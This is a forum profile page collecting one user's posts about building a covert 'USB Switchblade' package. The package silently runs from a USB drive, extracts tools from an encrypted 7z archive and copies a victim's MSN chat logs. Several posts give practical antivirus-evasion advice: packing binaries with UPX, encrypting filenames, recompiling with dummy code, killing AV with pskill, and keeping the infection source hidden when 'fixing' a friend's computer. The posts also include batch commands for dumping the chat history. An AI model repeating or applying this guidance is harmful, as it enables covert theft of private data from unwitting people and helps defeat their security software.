Gandalf the l33er
-
Posts
48 -
Joined
-
Last visited
Posts posted by Gandalf the l33er
-
-
A program that uses the windows API in a silly way would not be able to find the files for some reason.
Similarly, people who hide file extensions will find that they can not use the file browser in WinLAME as it will error with a file not found type error.
For some reason though, when I do not unhide them, they can still be executed.
I think that the only problem when hiding executables is that some programs won't view the files - which is the whole point of hidden files.
They should still be able to execute.
-
I can do that with a winrar/UPX/UHARC compression as well..though UHARC probably is listed as an "illegally used compressor" ...but my are we getting away from topic...nice job as allways 8-)
I have compressed ALL files in 7zBlade with UPX, and it also prevents AV from detecting the "tools", sometimes even when they are run.
-
Yeah, actually the 7z format is the best on the market for many applications! You should try 7-zip.
Well...i still prefer .rar,but you know that :p
Though i don't think that there are man AV's that will scan .7zip properly,simply because it isn't really a much used format...
Yearh i know
And even if they scanned, they wouldn't find anything, because even the file _names_ are encrypted.
Btw: I could insert DontDetectMeStupidAV in the middle of all filenames to disable AV detection by name :-D
-
-
Dear everybody. .
8< The advantage is that virus scanners can't find harmfull files inside a encrypted archive, + smaller overall size (around 1
8<
That's not entirely true. A zipped file with a single layer of encryption still exposes the file names in the archive. If the scanner is set to search for certain file types (vbs, scr, bat) etc, it will delete the file. This is particularly true when sending archives through email. The one way to combat this is to zip the files, encrypt, zip the zip, encrypt. Then the scanner only see the second encrypted zip file.
You are right, that problem applies to Zip files. But not to 7z files, especially not when you check the "encrypt filenames" button
. If you try to open the image in 7-zip, you will be prompted for PW before the contents are shown - not only when you extract. So, the AV can't detect the harmful files in the archive, only the files extracted to %temp%devices, and it can for sure NOT track back where the files were extracted from (Which is nice - when you are "fixing" a friends computer, they see the virus was located at the c: drive, not on your thumb drive).
-
Any modern AV monitors _constantly_ for the opening of files - vbs, doc, exe and many more file types - and _before_ they are opened, they are scanned. After they are opened, memory is scanned every x milliseconds to check if any process created a malicious thread or contains a malicious file.
So, atm where the AV gets to know the .exe in its definition file, the only thing you can do is to obscurize it with UPX.
-
-
google! mother fucker do you speak it?
C++ is OOP for C
http://en.wikipedia.org/wiki/C%2B%2B
most people think of C++ as simpler to learn
Just to clarify: C is used as OOP, but OOP is just a lot more simpler and powerful in C++.
Actually, i think C is much more straightforward to learn that C++, think about learning a n00b about operator overloading 8-)
-
One of two things will happen:
1. When the program is decrypted the AV grabs it
or
2. The AV will detect the embedded code used to decrypt the executable (because the .exe will not magically decrypt itself there needs to be code there to do it) and probably flag that as a virus / suspicious
V'cent, sablefoxx is right. The executable will be decrypted into memory at _some_ point, and the AV will grab it.
The only other solutions are making a rootkit or recompiling source with different settings/addded dummy code.
-
Although Very nice indeed,you might want to include a process hider,as cmd is shown in the ctrl+alt+del menu,and one can hear the hard drive suddenly starting to work...(though these things may be ignored)And my AV detects a pretty big lot of infected files inside of the .7zip...
It is very hard... i _have_ compressed all the files, but as soon as they are run, the memory image in RAM is the same as if they were not compressed. The only way of making them undetectable is to recompile them with a lot of unused functions (which only exist to change the binary pattern) added.
The problem is that many of the apps are commercial or non Open-Source, so recompiling isn't that simple.
If they should be hidden for taskmanager is the only _easy_ way to make them services, which also needs recompiling.
There is one other possibility: A rootkit. But i am not a H4xX0R, i'm only a _1337_ h4xX0r. Maybe you can ask the good folks at Sony if you need a rootkit :P
Which executables do your AV detect (btw i AM planning to include an AV killer (maybe hexlax', as soon he makes an AV-kill-only versoin))?
-
-
lots of different methods, look around through the forums to find them.
Hint: pskill.exe (from sysinternals)
[/quote
i think i wouldn´t need to kill the antivirus bc in that case people wil notice about it, i would just need to disable it for about 6-7 hours a day during a week or someting and then leave it as before. and if i use the killer anti-virus, i think this will erase it forever right?
any advice/suggestion?
The AV finds viruses by looking at the bit layout... try to modify the applications by packing/unpacking them with upx, http://upx.sourceforge.net/. Open a cmd, cd to the folder containing the files and upx.exe, enter
upx -9 *
to compress all files as much as possible, or
upx -d *
to decompress.
-
Yes, | sends the output of the left-side commando to the right-size commando. A very common use of it is
cat largefile.txt | more
, which displays the file in "screens", using the utility more.exe.
Another way to say it: (taken from http://www.infionline.net/~wtnewton/batch/batguide.html)
Redirection and PipesNormally, input is taken from the keyboard and output goes to the console. Redirection allows input and output to refer to a file or device instead. Pipes allow the output of one program to be used as input to another program. These symbols only work with programs that read from "standard input" and write to "standard output" but fortunately this includes most DOS commands.
* The < symbol causes file to be fed to the program as input.
* The > symbol causes the program's output to be sent to the following file or device.
* The >> symbol causes the program's output to be appended to the file or device.
* The | symbol (the pipe) causes the output of the preceding program to be sent to the following program.
The following example shows how to use redirection with the FIND command...
@echo off
find %1<%2>nul
if not errorlevel 1 echo %2 contains %1
-
I read this topic about 6 or 7 times,
but i cannot see how to fix this unpacking thing.
so if you can show me? :S
Try 7-Zip. http://7-zip.org/.
It zips better than many other programs, extracts about all formats, and is free. I've used the command-line version in my project http://forums.hak5.org/index.php/topic,8347.0.html. I strongly recommend it.
After installing, just right-click on the file->7-Zip>Extract Here.
-
wut that look like (run=launchu3.exe ??), and that wouldn't make it silent, would i add like a -hide after it?
Why don't just google it before bothering us with it? try to google autorun.inf or launchu3.exe
-
He probably modded the CD partition as described in the switchblade thread.. Look around, you'll find it.
-
It's indeed a very nice package hexlax, mad_props to ya!
But, i like to keep it as small as possible, so i will wait till you have made a "light" version, that only kills AV.
I've updated my package quite a bit, added msn messenger chatlog stealer and made the whole thing a lot more customizeable. See the first post for details.
-
I don't think it's possible, if posssible you would have to sort of reflash the sontroller chip...
-
According to Nirsoft, http://www.nirsoft.net/utils/mspass.html should work with AOL.
-
I decided to come up with something new. This package first puts the dir to the messenger chat history folder in a text file (coudn't see any elegant way to do it), and then reads the textfile and put the dir in a var. Then it copies the chatlog.
Needed file: http://www.myupload.dk/showfile/9418f7520.exe/
Commands:
.MsnHistory.exe>msnlogdir.txt Set /P MSNLOG=<msnlogdir.txt del msnlogdir.txt md WIPdump%computername%Chatlog xcopy /E /C /H /Y /I "%MSNLOG%" "WIPdump%computername%Chatlog"
What do you think?
(the little cmdline app is a modded version of some code from some forum)
-
Ill include http://forums.hak5.org/index.php/topic,8319.0.html as soon as it gets released.
I've created a drop with the files at http://drop.io/hak5files.
Anybody can add files (hacks and similar) if they wish to. The password is Hak5Rulez.
-
Dear everybody. .
Just finished a version of the USB Switchblade, where all the files are stored in a 7zip file. The password for the file is haxx0r. The advantage is that virus scanners can't find harmfull files inside a encrypted archive, + smaller overall size (around 1 MB).
It works no matter where you place it, in any folder on any drive.
Files included:
Start. vbs: Runs run. bat in "silent" mode, VERY silent, NO black popups are shown
Run. bat: Decrypts and extracts the image. 7z using 7z. exe (7-zip command-line version) and runs the specified commands.
7z. exe: 7-zip CLI. (http://www.7-zip.org/)
image. 7z: A 7z archive encrypted with the password "haxx0r", containing the bin files.
NEWEST version:
ONLY 560 kb! Uses %temp% and finishes in about 19 seconds! Includes msn chatlog stealer
OLD version:
. If you try to open the image in 7-zip, you will be prompted for PW before the contents are shown - not only when you extract.
New and confused
in USB Hacks
Posted
You should try to search, and reads some books on computers, or read about it in the internet. You have to have a solid knowledge about computers to understand this fully.